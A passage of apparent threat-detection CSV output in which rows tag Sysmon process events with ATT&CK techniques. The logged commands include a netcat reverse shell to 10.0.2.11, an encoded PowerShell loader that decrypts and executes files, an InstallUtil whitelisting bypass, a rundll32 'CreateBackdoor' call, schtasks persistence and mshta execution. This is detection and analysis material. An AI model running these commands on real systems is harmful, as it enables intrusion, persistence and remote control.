<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.631669Z"">
</TimeCreated>
<EventRecordID>424079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.627</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001079C05B00</Data>
<Data Name=""ProcessId"">8572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">schtasks.exe</Data>
<Data Name=""CommandLine"">schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
<Data Name=""ParentProcessId"">5572</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:08.202018Z"">
</TimeCreated>
<EventRecordID>4897</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:08.174</Data>
<Data Name=""ProcessGuid"">747F3D96-6614-5D3F-0000-001093CE8600</Data>
<Data Name=""ProcessId"">108</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.563997Z"">
</TimeCreated>
<EventRecordID>5964</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.513</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010CFCAFF00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-11T23:21:56.661289Z"">
</TimeCreated>
<EventRecordID>141993</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2896"" ThreadID=""3548"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-11 23:21:56.654</Data>
<Data Name=""ProcessGuid"">747F3D96-DE14-5EB9-0000-001079154300</Data>
<Data Name=""ProcessId"">224</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DE14-5EB9-0000-00107C0F4300</Data>
<Data Name=""ParentProcessId"">4468</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\Misc\nc64.exe</Data>
<Data Name=""ParentCommandLine"">c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
